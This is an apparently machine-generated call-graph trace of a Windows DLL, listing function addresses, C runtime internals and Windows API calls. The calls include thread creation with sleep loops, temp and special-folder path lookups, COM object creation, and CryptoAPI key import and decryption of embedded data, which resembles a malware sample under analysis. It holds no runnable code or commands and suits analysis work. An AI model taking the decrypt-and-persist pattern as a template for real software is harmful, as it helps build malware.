__dosmaperr 71943->72049 71945 6c3a2567 72068 6c392f04 14 API calls __dosmaperr 71945->72068 71947 6c3a2215 71946->71947 71949 6c3a226e 71946->71949 71955 6c3a229e 71946->71955 71947->71905 72050 6c392f17 14 API calls __dosmaperr 71949->72050 71950 6c3a227b 72069 6c393a4e 29 API calls __wsopen_s 71950->72069 71952 6c3a2273 72051 6c392f04 14 API calls __dosmaperr 71952->72051 71956 6c3a22b7 71955->71956 71958 6c3a22f2 71955->71958 71959 6c3a22c4 71955->71959 71957 6c3a22e0 71956->71957 71956->71959 71965 6c3a71c6 __fread_nolock 29 API calls 71957->71965 72055 6c39a641 15 API calls __dosmaperr 71958->72055 72052 6c392f17 14 API calls __dosmaperr 71959->72052 71962 6c3a22c9 72053 6c392f04 14 API calls __dosmaperr 71962->72053 71968 6c3a243e 71965->71968 71966 6c3a2303 72056 6c39a607 14 API calls __dosmaperr 71966->72056 71967 6c3a22d0 72054 6c393a4e 29 API calls __wsopen_s 71967->72054 71972 6c3a24b2 71968->71972 71975 6c3a2457 GetConsoleMode 71968->71975 71970 6c3a230c 72057 6c39a607 14 API calls __dosmaperr 71970->72057 71974 6c3a24b6 ReadFile 71972->71974 71977 6c3a252a GetLastError 71974->71977 71978 6c3a24ce 71974->71978 71975->71972 71979 6c3a2468 71975->71979 71976 6c3a2313 71980 6c3a2338 71976->71980 71981 6c3a231d 71976->71981 71982 6c3a2537 71977->71982 71990 6c3a248e 71977->71990 71978->71977 71988 6c3a24a7 71978->71988 71979->71974 71983 6c3a246e ReadConsoleW 71979->71983 72060 6c39fcdb 31 API calls 2 library calls 71980->72060 72058 6c392f04 14 API calls __dosmaperr 71981->72058 72065 6c392f04 14 API calls __dosmaperr 71982->72065 71983->71988 71989 6c3a2488 GetLastError 71983->71989 71997 6c3a250a 71988->71997 71998 6c3a24f3 71988->71998 71999 6c3a22db __fread_nolock 71988->71999 71989->71990 71990->71999 72061 6c392f2a 14 API calls __dosmaperr 71990->72061 71991 6c3a2322 72059 6c392f17 14 API calls __dosmaperr 71991->72059 71992 6c3a253c 72066 6c392f17 14 API calls __dosmaperr 71992->72066 71993 6c3a2346 71993->71957 71997->71999 72000 6c3a2523 71997->72000 72063 6c3a25ff 34 API calls 3 library calls 71998->72063 72062 6c39a607 14 API calls __dosmaperr 71999->72062 72064 6c3a28a3 32 API calls __fread_nolock 72000->72064 72001 6c3a232d 72001->71999 72004->71900 72006 6c3a20e9 ___scrt_is_nonwritable_in_current_image 72005->72006 72007 6c3a20f1 72006->72007 72010 6c3a210c 72006->72010 72038 6c392f17 14 API calls __dosmaperr 72007->72038 72009 6c3a20f6 72039 6c392f04 14 API calls __dosmaperr 72009->72039 72011 6c3a2123 72010->72011 72014 6c3a215e 72010->72014 72040 6c392f17 14 API calls __dosmaperr 72011->72040 72016 6c3a217c 72014->72016 72017 6c3a2167 72014->72017 72015 6c3a2128 72041 6c392f04 14 API calls __dosmaperr 72015->72041 72037 6c3a7171 EnterCriticalSection 72016->72037 72043 6c392f17 14 API calls __dosmaperr 72017->72043 72021 6c3a216c 72044 6c392f04 14 API calls __dosmaperr 72021->72044 72022 6c3a2182 72025 6c3a21a1 72022->72025 72026 6c3a21b6 72022->72026 72023 6c3a2130 72042 6c393a4e 29 API calls __wsopen_s 72023->72042 72045 6c392f04 14 API calls __dosmaperr 72025->72045 72029 6c3a21f6 __fread_nolock 41 API calls 72026->72029 72031 6c3a21b1 72029->72031 72030 6c3a21a6 72046 6c392f17 14 API calls __dosmaperr 72030->72046 72047 6c3a21ee LeaveCriticalSection __wsopen_s 72031->72047 72034 6c3a1d9b 72034->71921 72034->71927 72035->71917 72036->71921 72037->72022 72038->72009 72039->72034 72040->72015 72041->72023 72042->72034 72043->72021 72044->72023 72045->72030 72046->72031 72047->72034 72048->71943 72049->71947 72050->71952 72051->71950 72052->71962 72053->71967 72054->71999 72055->71966 72056->71970 72057->71976 72058->71991 72059->72001 72060->71993 72061->71999 72062->71947 72063->71999 72064->72001 72065->71992 72066->71999 72067->71945 72068->71950 72069->71947 72070 6c37aa90 72071 6c37ab8d _Yarn 72070->72071 72073 6c37aab3 _Yarn 72070->72073 72072 6c394c68 69 API calls 72071->72072 72071->72073 72072->72073 72074 6c389b10 72122 6c371a30 72074->72122 72076 6c389b45 72144 6c3893e0 GetModuleFileNameA 72076->72144 72078 6c389bae _Yarn 72167 6c387590 72078->72167 72079 6c389b5b _strlen 72079->72078 72522 6c372c20 39 API calls 3 library calls 72079->72522 72082 6c389f77 72086 6c393a5e 29 API calls 72082->72086 72083 6c389c0b error_info_injector 72083->72082 72116 6c389da2 error_info_injector 72083->72116 72196 6c387eb0 72083->72196 72084 6c389e27 CreateThread 72088 6c389e40 WaitForSingleObject 72084->72088 72089 6c389eb3 72084->72089 73150 6c3880e0 Sleep 72084->73150 72087 6c389f7c 72086->72087 72093 6c3729d0 29 API calls 72087->72093 72088->72089 72094 6c389e55 CloseHandle 72088->72094 72252 6c3896a0 GetModuleFileNameA 72089->72252 72091 6c389cbd 72092 6c3893e0 31 API calls 72091->72092 72105 6c389cc9 _strlen 72092->72105 72098 6c389f8f 72093->72098 72099 6c389e64 72094->72099 72101 6c389e83 error_info_injector 72094->72101 72096 6c389dfd CreateThread 72096->72084 72099->72082 72099->72101 72100 6c389ed8 72278 6c3892f0 GetModuleFileNameA 72100->72278 72103 6c389eeb 72289 6c386410 72103->72289 72113 6c389d0b _Yarn error_info_injector 72105->72113 72523 6c372c20 39 API calls 3 library calls 72105->72523 72106 6c389f04 72306 6c3899f0 72106->72306 72112 6c389f2c 72331 6c377e80 GetTempPathA 72112->72331 72113->72082 72204 6c395185 72113->72204 72116->72082 72116->72084 72217 6c388a70 72116->72217 72524 6c393ef1 GetSystemTimeAsFileTime 72122->72524 72124 6c371a64 72526 6c395147 72124->72526 72129 6c395159 39 API calls 72130 6c371abf 72129->72130 72532 6c371c70 72130->72532 72133 6c371b08 72134 6c371b78 72133->72134 72545 6c371000 72133->72545 72563 6c3933d3 72133->72563 72571 6c3718c0 72133->72571 72594 6c393423 29 API calls 2 library calls 72133->72594 72136 6c371bb4 error_info_injector 72134->72136 72137 6c393a5e 29 API calls 72134->72137 72136->72076 72138 6c371bdb 72137->72138 72595 6c371c00 29 API calls error_info_injector 72138->72595 72142 6c371b67 Sleep 72142->72133 72142->72134 72143 6c371bef 72143->72076 72145 6c38943f _strlen 72144->72145 72146 6c38944a 72145->72146 72147 6c38965e 72145->72147 72150 6c389488 72146->72150 72151 6c3894ac 72146->72151 72159 6c389451 _Yarn 72146->72159 72694 6c3726c0 30 API calls 3 library calls 72147->72694 72149 6c389663 72695 6c3726c0 30 API calls 3 library calls 72149->72695 72154 6c38aa0e 3 API calls 72150->72154 72152 6c38aa0e 3 API calls 72151->72152 72152->72159 72154->72159 72155 6c393a5e 29 API calls 72156 6c389674 72155->72156 72157 6c3729d0 29 API calls 72156->72157 72158 6c38968f 72157->72158 72158->72079 72159->72149 72161 6c38954a 72159->72161 72166 6c38954f _Yarn 72159->72166 72160 6c38958c error_info_injector 72160->72079 72162 6c3895de 72161->72162 72163 6c3895be 72161->72163 72161->72166 72165 6c38aa0e 3 API calls 72162->72165 72164 6c38aa0e 3 API calls 72163->72164 72164->72166 72165->72166 72166->72155 72166->72160 72168 6c3875e4 72167->72168 72696 6c37c580 72168->72696 72170 6c3875f8 72195 6c387697 error_info_injector 72170->72195 72715 6c387880 72170->72715 72173 6c37a100 72 API calls 72175 6c3877de std::ios_base::_Ios_base_dtor 72173->72175 72175->72083 72177 6c387671 72181 6c3876cb 72177->72181 72182 6c3876e4 72177->72182 72186 6c387676 __fread_nolock 72177->72186 72178 6c387812 72757 6c3726c0 30 API calls 3 library calls 72178->72757 72180 6c387817 72183 6c393a5e 29 API calls 72180->72183 72184 6c38aa0e 3 API calls 72181->72184 72185 6c38aa0e 3 API calls 72182->72185 72187 6c38781c 72183->72187 72184->72186 72185->72186 72740 6c387ca0 75 API calls Concurrency::cancel_current_task 72186->72740 72758 6c37a050 72 API calls std::ios_base::_Ios_base_dtor 72187->72758 72190 6c387838 72190->72083 72191 6c38773c 72192 6c387799 72191->72192 72193 6c38774b 72191->72193 72741 6c379b70 72192->72741 72193->72180 72193->72195 72195->72173 72884 6c376eb0 72196->72884 72198 6c387f15 error_info_injector 72199 6c387fae error_info_injector 72198->72199 72200 6c393a5e 29 API calls 72198->72200 72199->72091 72201 6c387fdc 72200->72201 72202 6c3729d0 29 API calls 72201->72202 72203 6c387fef 72202->72203 72203->72091 72205 6c39519d 72204->72205 72206 6c395193 72204->72206 72208 6c3951ef __wsopen_s 39 API calls 72205->72208 72207 6c3a357e 16 API calls 72206->72207 72209 6c39519a 72207->72209 72210 6c3951b7 72208->72210 72209->72116 72211 6c38f7f4 __wsopen_s 17 API calls 72210->72211 72213 6c3951c4 72211->72213 73038 6c386110 72217->73038 72219 6c388b24 72221 6c388b70 _Yarn error_info_injector 72219->72221 73049 6c372c20 39 API calls 3 library calls 72219->73049 72223 6c388cd1 GetFileAttributesA 72221->72223 72247 6c389163 error_info_injector 72221->72247 72222 6c393a5e 29 API calls 72224 6c3891ef 72222->72224 72225 6c388ce1 SHGetFolderPathA 72223->72225 72223->72247 73053 6c3726c0 30 API calls 3 library calls 72224->73053 72231 6c388cfd _strlen 72225->72231 72225->72247 72227 6c3891c5 error_info_injector 72227->72096 72228 6c3891fb 72229 6c3729d0 29 API calls 72228->72229 72230 6c389212 72229->72230 72230->72096 72231->72224 72232 6c388d8d 72231->72232 72233 6c388d6e 72231->72233 72236 6c388d2a _Yarn 72231->72236 72234 6c38aa0e 3 API calls 72232->72234 72235 6c38aa0e 3 API calls 72233->72235 72234->72236 72235->72236 72239 6c388e04 72236->72239 73050 6c372c20 39 API calls 3 library calls 72236->73050 72238 6c388eac _Yarn 72242 6c388f4d error_info_injector 72238->72242 73052 6c372c20 39 API calls 3 library calls 72238->73052 72239->72238 73051 6c372c20 39 API calls 3 library calls 72239->73051 72243 6c389091 GetFileAttributesA 72242->72243 72242->72247 72244 6c3890a1 CoInitialize CoCreateInstance 72243->72244 72243->72247 72245 6c3890c9 MultiByteToWideChar 72244->72245 72246 6c38915d CoUninitialize 72244->72246 72250 6c389103 72245->72250 72246->72247 72247->72222 72247->72227 72249 6c38914b 72249->72246 72250->72249 72251 6c389126 MultiByteToWideChar 72250->72251 72251->72249 72253 6c3896ff _strlen 72252->72253 72254 6c38970a 72253->72254 72255 6c38999f 72253->72255 72256 6c389711 _Yarn 72254->72256 72258 6c389748 72254->72258 72259 6c389766 72254->72259 73055 6c3726c0 30 API calls 3 library calls 72255->73055 72260 6c3899a4 72256->72260 72269 6c389877 72256->72269 72277 6c3898b9 error_info_injector 72256->72277 72262 6c38aa0e 3 API calls 72258->72262 72263 6c38aa0e 3 API calls 72259->72263 73056 6c375880 72260->73056 72262->72256 72263->72256 72264 6c3899b0 73059 6c3726c0 30 API calls 3 library calls 72264->73059 72266 6c393a5e 29 API calls 72267 6c3899c1 72266->72267 72268 6c3729d0 29 API calls 72267->72268 72270 6c3899df 72268->72270 72269->72264 72271 6c389896 72269->72271 72270->72100 72272 6c389926 72271->72272 72273 6c389906 72271->72273 72276 6c38989d _Yarn 72271->72276 72274 6c38aa0e 3 API calls 72272->72274 72275 6c38aa0e 3 API calls 72273->72275 72274->72276 72275->72276 72276->72266 72276->72277 72277->72100 72279 6c38932b _strlen 72278->72279 72280 6c3893ce 72279->72280 72281 6c389336 72279->72281 73061 6c3726c0 30 API calls 3 library calls 72280->73061 72283 6c38936e 72281->72283 72284 6c389397 72281->72284 72288 6c38933d _Yarn 72281->72288 72286 6c38aa0e 3 API calls 72283->72286 72287 6c38aa0e 3 API calls 72284->72287 72285 6c3893d3 72286->72288 72287->72288 72288->72103 72290 6c386434 _strlen 72289->72290 72291 6c3864c9 72290->72291 72292 6c38643f 72290->72292 73062 6c3726c0 30 API calls 3 library calls 72291->73062 72294 6c386497 72292->72294 72295 6c386477 72292->72295 72299 6c386446 _Yarn 72292->72299 72296 6c38aa0e 3 API calls 72294->72296 72298 6c38aa0e 3 API calls 72295->72298 72296->72299 72297 6c3864f9 error_info_injector 72297->72106 72298->72299 72299->72106 72300 6c3864ce 72300->72297 72301 6c393a5e 29 API calls 72300->72301 72302 6c38652c 72301->72302 72303 6c386559 error_info_injector 72302->72303 72304 6c393a5e 29 API calls 72302->72304 72303->72106 72305 6c386592 72304->72305 72307 6c389a09 GetModuleHandleA 72306->72307 72308 6c389a07 72306->72308 72309 6c389a1b __fread_nolock 72307->72309 72310 6c389a85 72307->72310 72308->72307 72311 6c389a2c GetModuleFileNameA 72309->72311 72322 6c3729d0 72310->72322 72311->72310 72312 6c389a43 _strlen 72311->72312 72313 6c389b01 72312->72313 72314 6c389a65 72312->72314 73063 6c3726c0 30 API calls 3 library calls 72313->73063 72317 6c389aca 72314->72317 72318 6c389ab3 72314->72318 72321 6c389a6c _Yarn 72314->72321 72316 6c389b06 72320 6c38aa0e 3 API calls 72317->72320 72319 6c38aa0e 3 API calls 72318->72319 72319->72321 72320->72321 72321->72310 72323 6c3729dc 72322->72323 72324 6c372a03 error_info_injector 72322->72324 72323->72324 72325 6c393a5e 29 API calls 72323->72325 72324->72112 72326 6c372a26 _Yarn 72325->72326 72327 6c372b92 error_info_injector 72326->72327 72328 6c393a5e 29 API calls 72326->72328 72327->72112 72329 6c372bdf 72328->72329 72330 6c3729d0 29 API calls 72329->72330 72334 6c377ef7 _strlen 72331->72334 72332 6c3795b7 73089 6c3726c0 30 API calls 3 library calls 72332->73089 72334->72332 72335 6c377f60 72334->72335 72336 6c377f49 72334->72336 72341 6c377f09 _Yarn 72334->72341 72339 6c38aa0e 3 API calls 72335->72339 72338 6c38aa0e 3 API calls 72336->72338 72337 6c3795bc 73090 6c3726c0 30 API calls 3 library calls 72337->73090 72338->72341 72339->72341 72348 6c377fe0 72341->72348 73070 6c372c20 39 API calls 3 library calls 72341->73070 72350 6c37b880 130 API calls 72348->72350 72355 6c378074 error_info_injector 72350->72355 72522->72078 72523->72113 72525 6c393f2a __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 72524->72525 72525->72124 72596 6c39a893 GetLastError 72526->72596 72529 6c395159 72530 6c39a893 __Getctype 39 API calls 72529->72530 72531 6c371a9c 72530->72531 72531->72129 72533 6c371de5 72532->72533 72535 6c371ccb 72532->72535 72632 6c371df0 30 API calls 2 library calls 72533->72632 72536 6c371d24 72535->72536 72537 6c371ce2 72535->72537 72543 6c371cfe _Yarn 72535->72543 72538 6c38aa0e 3 API calls 72536->72538 72537->72533 72540 6c371cee 72537->72540 72538->72543 72539 6c393a5e 29 API calls 72541 6c371def 72539->72541 72542 6c38aa0e 3 API calls 72540->72542 72542->72543 72543->72539 72544 6c371db3 error_info_injector 72543->72544 72544->72133 72546 6c37100d 72545->72546 72547 6c371039 72545->72547 72546->72547 72550 6c3711b0 39 API calls 72546->72550 72633 6c3711b0 72547->72633 72549 6c371048 72551 6c371136 72549->72551 72555 6c3711b0 39 API calls 72549->72555 72550->72546 72552 6c371169 72551->72552 72554 6c3711b0 39 API calls 72551->72554 72553 6c3711b0 39 API calls 72552->72553 72556 6c371178 72553->72556 72554->72551 72555->72549 72557 6c3711b0 39 API calls 72556->72557 72558 6c37118a 72557->72558 72643 6c3715d0 72558->72643 72561 6c3711b0 39 API calls 72562 6c3711a2 72561->72562 72562->72133 72564 6c3933df ___scrt_is_nonwritable_in_current_image 72563->72564 72666 6c393d46 EnterCriticalSection 72564->72666 72566 6c3933e6 72667 6c393691 72566->72667 72572 6c3718e7 72571->72572 72573 6c37193c 72572->72573 72578 6c371b16 72572->72578 72574 6c3719a2 72573->72574 72576 6c395159 39 API calls 72573->72576 72583 6c38aa82 _ValidateLocalCookies 5 API calls 72574->72583 72575 6c3718c0 95 API calls 72577 6c371b67 Sleep 72575->72577 72580 6c371978 72576->72580 72577->72578 72579 6c371b78 72577->72579 72578->72575 72581 6c371000 75 API calls 72578->72581 72585 6c3933d3 28 API calls 72578->72585 72692 6c393423 29 API calls 2 library calls 72578->72692 72586 6c371bb4 error_info_injector 72579->72586 72589 6c393a5e 29 API calls 72579->72589 72582 6c395159 39 API calls 72580->72582 72581->72578 72587 6c371984 72582->72587 72584 6c371a1f 72583->72584 72584->72142 72585->72578 72586->72142 72587->72574 72588 6c371c70 30 API calls 72587->72588 72588->72574 72591 6c371bdb 72589->72591 72693 6c371c00 29 API calls error_info_injector 72591->72693 72593 6c371bef 72593->72142 72594->72133 72595->72143 72597 6c39a8a9 72596->72597 72598 6c39a8af 72596->72598 72623 6c39c942 6 API calls std::_Lockit::_Lockit 72597->72623 72602 6c39a8b3 SetLastError 72598->72602 72624 6c39c981 6 API calls std::_Lockit::_Lockit 72598->72624 72601 6c39a8cb 72601->72602 72604 6c39cf6f __dosmaperr 14 API calls 72601->72604 72606 6c39a948 72602->72606 72607 6c371a6d 72602->72607 72605 6c39a8e0 72604->72605 72608 6c39a8f9 72605->72608 72609 6c39a8e8 72605->72609 72631 6c393fb8 39 API calls std::locale::_Setgloballocale 72606->72631 72607->72529 72626 6c39c981 6 API calls std::_Lockit::_Lockit 72608->72626 72625 6c39c981 6 API calls std::_Lockit::_Lockit 72609->72625 72614 6c39a8f6 72628 6c39a607 14 API calls __dosmaperr 72614->72628 72615 6c39a905 72616 6c39a909 72615->72616 72617 6c39a920 72615->72617 72627 6c39c981 6 API calls std::_Lockit::_Lockit 72616->72627 72629 6c39abd0 14 API calls __dosmaperr 72617->72629 72621 6c39a92b 72630 6c39a607 14 API calls __dosmaperr 72621->72630 72623->72598 72624->72601 72625->72614 72626->72615 72627->72614 72628->72602 72629->72621 72630->72602 72632->72543 72634 6c3711e8 _strlen 72633->72634 72642 6c371259 72634->72642 72655 6c372060 39 API calls Concurrency::cancel_current_task 72634->72655 72638 6c3714a6 72638->72549 72639 6c371493 72639->72638 72656 6c372d90 39 API calls Concurrency::cancel_current_task 72639->72656 72642->72639 72657 6c372300 38 API calls 72642->72657 72658 6c3726d0 30 API calls 3 library calls 72642->72658 72659 6c38d2b3 RaiseException 72642->72659 72644 6c37160f 72643->72644 72648 6c37164d 72644->72648 72654 6c371623 72644->72654 72660 6c372060 39 API calls Concurrency::cancel_current_task 72644->72660 72647 6c37175d 72650 6c371197 72647->72650 72662 6c372d90 39 API calls Concurrency::cancel_current_task 72647->72662 72648->72654 72661 6c372eb0 67 API calls 2 library calls 72648->72661 72650->72561 72654->72647 72663 6c372300 38 API calls 72654->72663 72664 6c3726d0 30 API calls 3 library calls 72654->72664 72665 6c38d2b3 RaiseException 72654->72665 72655->72642 72656->72638 72657->72642 72658->72642 72659->72642 72660->72648 72661->72654 72662->72650 72663->72654 72664->72654 72665->72654 72666->72566 72668 6c3936af 72667->72668 72669 6c3936be 72668->72669 72686 6c3a0a69 CreateFileW ___initconin 72668->72686 72672 6c38aa82 _ValidateLocalCookies 5 API calls 72669->72672 72671 6c3936cb 72671->72669 72687 6c3a0ada 5 API calls ___initconin 72671->72687 72674 6c3933f4 72672->72674 72683 6c39341a 72674->72683 72675 6c3936dc 72675->72669 72676 6c39371c 72675->72676 72680 6c393709 __alloca_probe_16 72675->72680 72682 6c393746 72675->72682 72688 6c39a641 15 API calls __dosmaperr 72676->72688 72679 6c393722 72679->72680 72680->72682 72689 6c3a0b20 5 API calls ___initconin 72680->72689 72690 6c38cb0b 14 API calls ___std_type_info_destroy_list 72682->72690 72691 6c393d5d LeaveCriticalSection 72683->72691 72685 6c393405 72685->72133 72686->72671 72687->72675 72688->72679 72689->72682 72690->72669 72691->72685 72692->72578 72693->72593 72694->72149 72695->72166 72697 6c37c5b5 72696->72697 72698 6c37bd70 77 API calls 72697->72698 72699 6c37c656 72698->72699 72700 6c38aa0e 3 API calls 72699->72700 72701 6c37c68e 72700->72701 72702 6c38b2cf 44 API calls 72701->72702 72703 6c37c6a2 72702->72703 72704 6c37bb60 118 API calls 72703->72704 72705 6c37c74b 72704->72705 72706 6c37c785 72705->72706 72759 6c372300 38 API calls 72705->72759 72706->72170 72708 6c37c7bf 72760 6c3726d0 30 API calls 3 library calls 72708->72760 72710 6c37c7d1 72761 6c38d2b3 RaiseException 72710->72761 72712 6c37c7e6 72713 6c37a100 72 API calls 72712->72713 72714 6c37c7ff 72713->72714 72714->72170 72716 6c3878bf 72715->72716 72762 6c37cd30 72716->72762 72719 6c38761b 72721 6c387a10 72719->72721 72722 6c387a79 72721->72722 72723 6c387b55 72721->72723 72726 6c37cd30 75 API calls 72722->72726 72875 6c372300 38 API calls 72723->72875 72725 6c387b7e 72876 6c372370 30 API calls 72725->72876 72728 6c387aa1 72726->72728 72730 6c387ab5 72728->72730 72739 6c37ac40 70 API calls 72728->72739 72729 6c387b90 72877 6c38d2b3 RaiseException 72729->72877 72732 6c387651 72730->72732 72878 6c372300 38 API calls 72730->72878 72732->72177 72732->72178 72734 6c387bca 72879 6c3726d0 30 API calls 3 library calls 72734->72879 72736 6c387be5 72880 6c38d2b3 RaiseException 72736->72880 72738 6c387bfa 72739->72730 72740->72191 72742 6c379b89 72741->72742 72752 6c379bb9 72741->72752 72744 6c37b030 69 API calls 72742->72744 72743 6c379c7a 72746 6c38aa82 _ValidateLocalCookies 5 API calls 72743->72746 72747 6c379baf 72744->72747 72745 6c379c8c 72881 6c372300 38 API calls 72745->72881 72748 6c379c85 72746->72748 72750 6c394007 69 API calls 72747->72750 72748->72195 72750->72752 72751 6c379cbc 72882 6c372370 30 API calls 72751->72882 72752->72743 72752->72745 72754 6c379ccc 72883 6c38d2b3 RaiseException 72754->72883 72756 6c379cd7 72757->72180 72758->72190 72759->72708 72760->72710 72761->72712 72763 6c37cda1 72762->72763 72764 6c37cd6c 72762->72764 72766 6c37cdb2 72763->72766 72793 6c372060 39 API calls Concurrency::cancel_current_task 72763->72793 72765 6c37cd9a 72764->72765 72795 6c372300 38 API calls 72764->72795 72765->72719 72780 6c37ac40 72765->72780 72766->72765 72794 6c374ca0 67 API calls 3 library calls 72766->72794 72769 6c37cf7f 72796 6c372370 30 API calls 72769->72796 72771 6c37cf8e 72797 6c38d2b3 RaiseException 72771->72797 72775 6c37cfcb 72799 6c372370 30 API calls 72775->72799 72777 6c37cfe1 72800 6c38d2b3 RaiseException 72777->72800 72779 6c37cdec 72779->72765 72798 6c372300 38 API calls 72779->72798 72781 6c37ac92 72780->72781 72782 6c37acdc 72780->72782 72784 6c37b030 69 API calls 72781->72784 72783 6c38aa82 _ValidateLocalCookies 5 API calls 72782->72783 72792 6c37acfe 72783->72792 72785 6c37ac9d 72784->72785 72785->72782 72786 6c37acb9 72785->72786 72801 6c392fee 72785->72801 72786->72782 72805 6c394614 72786->72805 72789 6c37acd1 72789->72782 72790 6c37ad0a 72789->72790 72791 6c38aa82 _ValidateLocalCookies 5 API calls 72790->72791 72791->72792 72792->72719 72793->72766 72794->72779 72795->72769 72796->72771 72797->72779 72798->72775 72799->72777 72800->72765 72802 6c393001 __wsopen_s 72801->72802 72803 6c393267 67 API calls 72802->72803 72804 6c393016 __wsopen_s 72803->72804 72804->72786 72806 6c39461f 72805->72806 72807 6c394634 72805->72807 72823 6c392f04 14 API calls __dosmaperr 72806->72823 72809 6c39463c 72807->72809 72810 6c394651 72807->72810 72825 6c392f04 14 API calls __dosmaperr 72809->72825 72819 6c39feff 72810->72819 72812 6c394624 72824 6c393a4e 29 API calls __wsopen_s 72812->72824 72814 6c39464c 72814->72789 72816 6c394641 72826 6c393a4e 29 API calls __wsopen_s 72816->72826 72817 6c39462f 72817->72789 72820 6c39ff13 __wsopen_s 72819->72820 72827 6c3a04a8 72820->72827 72822 6c39ff1f __wsopen_s 72822->72814 72823->72812 72824->72817 72825->72816 72826->72814 72828 6c3a04b4 ___scrt_is_nonwritable_in_current_image 72827->72828 72829 6c3a04bb 72828->72829 72830 6c3a04de 72828->72830 72853 6c393bf7 29 API calls 2 library calls 72829->72853 72838 6c3900a9 EnterCriticalSection 72830->72838 72833 6c3a04d4 72833->72822 72834 6c3a04ec 72839 6c3a0307 72834->72839 72836 6c3a04fb 72854 6c3a052d LeaveCriticalSection __fread_nolock 72836->72854 72838->72834 72840 6c3a033e 72839->72840 72841 6c3a0316 72839->72841 72843 6c39f3a2 __fread_nolock 29 API calls 72840->72843 72858 6c393bf7 29 API calls 2 library calls 72841->72858 72844 6c3a0347 72843->72844 72855 6c39fd39 72844->72855 72845 6c3a0331 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 72845->72836 72848 6c3a03f1 72859 6c39ff91 34 API calls 4 library calls 72848->72859 72849 6c3a0408 72849->72845 72860 6c3a013c 33 API calls 2 library calls 72849->72860 72851 6c3a0400 72851->72845 72853->72833 72854->72833 72861 6c39fd57 72855->72861 72858->72845 72859->72851 72860->72845 72862 6c39fd63 ___scrt_is_nonwritable_in_current_image 72861->72862 72863 6c39fda6 72862->72863 72865 6c39fdec 72862->72865 72871 6c39fd52 72862->72871 72873 6c393bf7 29 API calls 2 library calls 72863->72873 72872 6c3a7171 EnterCriticalSection 72865->72872 72867 6c39fdf2 72868 6c39fe13 72867->72868 72869 6c39fe7c __fread_nolock 31 API calls 72867->72869 72874 6c39fe74 LeaveCriticalSection __wsopen_s 72868->72874 72869->72868 72871->72845 72871->72848 72871->72849 72872->72867 72873->72871 72874->72871 72875->72725 72876->72729 72877->72730 72878->72734 72879->72736 72880->72738 72881->72751 72882->72754 72883->72756 72933 6c376520 72884->72933 72886 6c376eee _Yarn 72887 6c376faf CryptAcquireContextW 72886->72887 72888 6c3773c2 72887->72888 72889 6c376fdc CryptImportKey 72887->72889 72957 6c38d87e 29 API calls 2 library calls 72888->72957 72891 6c377032 CryptSetKeyParam 72889->72891 72892 6c37742a CryptReleaseContext 72889->72892 72895 6c377494 CryptDestroyKey CryptReleaseContext 72891->72895 72896 6c37704a CryptSetKeyParam 72891->72896 72959 6c38d87e 29 API calls 2 library calls 72892->72959 72894 6c377404 72958 6c38d2b3 RaiseException 72894->72958 72961 6c38d87e 29 API calls 2 library calls 72895->72961 72900 6c377507 CryptDestroyKey CryptReleaseContext 72896->72900 72901 6c377070 72896->72901 72897 6c37746e 72960 6c38d2b3 RaiseException 72897->72960 72963 6c38d87e 29 API calls 2 library calls 72900->72963 72906 6c3775d8 72901->72906 72910 6c3770d7 72901->72910 72911 6c3770b3 72901->72911 72921 6c3770bc _Yarn 72901->72921 72903 6c3774e1 72962 6c38d2b3 RaiseException 72903->72962 72905 6c377422 72967 6c3726c0 30 API calls 3 library calls 72905->72967 72968 6c377640 54 API calls 4 library calls 72906->72968 72907 6c377115 CryptDecrypt CryptDestroyKey CryptReleaseContext 72914 6c377574 72907->72914 72925 6c377147 __fread_nolock 72907->72925 72909 6c377551 72964 6c38d2b3 RaiseException 72909->72964 72918 6c38aa0e 3 API calls 72910->72918 72917 6c38aa0e 3 API calls 72911->72917 72965 6c38d87e 29 API calls 2 library calls 72914->72965 72917->72921 72918->72921 72919 6c3775dd 72969 6c376720 72919->72969 72920 6c3775aa 72966 6c38d2b3 RaiseException 72920->72966 72921->72907 72924 6c3775ef 72924->72198 72925->72905 72926 6c377212 72925->72926 72927 6c37722b 72925->72927 72930 6c3771cf _Yarn error_info_injector 72925->72930 72929 6c38aa0e 3 API calls 72926->72929 72928 6c38aa0e 3 API calls 72927->72928 72928->72930 72929->72930 72931 6c393a5e 29 API calls 72930->72931 72932 6c377398 error_info_injector 72930->72932 72931->72888 72932->72198 72934 6c376561 CryptStringToBinaryA 72933->72934 72935 6c37655f 72933->72935 72936 6c37657e 72934->72936 72937 6c37662b 72934->72937 72935->72934 72941 6c3765cd 72936->72941 72942 6c3765aa 72936->72942 72955 6c3765b3 __fread_nolock 72936->72955 72956 6c376691 72936->72956 73014 6c3766c0 29 API calls 2 library calls 72937->73014 72939 6c37663a 73015 6c38d2b3 RaiseException 72939->73015 72940 6c376600 CryptStringToBinaryA 72946 6c376645 72940->72946 72947 6c376618 72940->72947 72949 6c38aa0e 3 API calls 72941->72949 72948 6c38aa0e 3 API calls 72942->72948 72945 6c376699 72950 6c376720 46 API calls 72945->72950 73016 6c38d87e 29 API calls 2 library calls 72946->73016 72947->72886 72948->72955 72949->72955 72952 6c3766af 72950->72952 72952->72886 72953 6c376672 73017 6c38d2b3 RaiseException 72953->73017 72955->72940 73018 6c377640 54 API calls 4 library calls 72956->73018 72957->72894 72958->72905 72959->72897 72960->72905 72961->72903 72962->72905 72963->72909 72964->72905 72965->72920 72966->72905 72967->72906 72968->72919 72970 6c37672a 72969->72970 72971 6c37674a error_info_injector 72969->72971 72970->72971 72972 6c393a5e 29 API calls 72970->72972 72971->72924 72973 6c376775 CryptAcquireContextW 72972->72973 72975 6c376e09 72973->72975 72996 6c376814 __fread_nolock 72973->72996 73029 6c38d87e 29 API calls 2 library calls 72975->73029 72977 6c37685e CryptCreateHash 72980 6c376d1c CryptReleaseContext 72977->72980 72977->72996 72978 6c3769e8 CryptReleaseContext 73011 6c376a0a _Yarn error_info_injector 72978->73011 72979 6c376e42 73030 6c38d2b3 RaiseException 72979->73030 73025 6c38d87e 29 API calls 2 library calls 72980->73025 72982 6c376884 CryptHashData 72984 6c376d8d CryptDestroyHash CryptReleaseContext 72982->72984 72982->72996 73027 6c38d87e 29 API calls 2 library calls 72984->73027 72985 6c376c52 72987 6c376720 30 API calls 72985->72987 72986 6c376d60 73026 6c38d2b3 RaiseException 72986->73026 72990 6c376e7f 72987->72990 72993 6c376720 30 API calls 72990->72993 72991 6c376dda 73028 6c38d2b3 RaiseException 72991->73028 72995 6c376e87 72993->72995 72994 6c3768e7 CryptHashData 72997 6c376904 CryptGetHashParam 